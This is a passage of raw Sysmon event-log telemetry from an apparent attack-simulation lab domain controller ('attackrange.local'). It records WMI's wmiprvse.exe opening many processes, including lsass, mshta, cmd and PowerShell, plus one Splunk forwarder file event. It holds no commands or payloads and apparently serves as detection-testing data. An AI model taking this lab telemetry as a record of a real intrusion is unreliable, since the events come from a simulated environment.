dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204163Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204162Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1400-00000000AD01}1096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204161Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1300-00000000AD01}896C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204160Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204159Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204158Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204157Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204156Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204155Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204154Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204153Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204152Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204151Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.915{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD843CCD9331E395C9B5774A074516C9,SHA256=4B413046857A832C0C70FB3D7C8DE01E2D383EA1796DB083562A3B9671A31459,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204150Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204149Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204148Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204147Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204146Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204145Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204144Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204143Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:03.900{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\co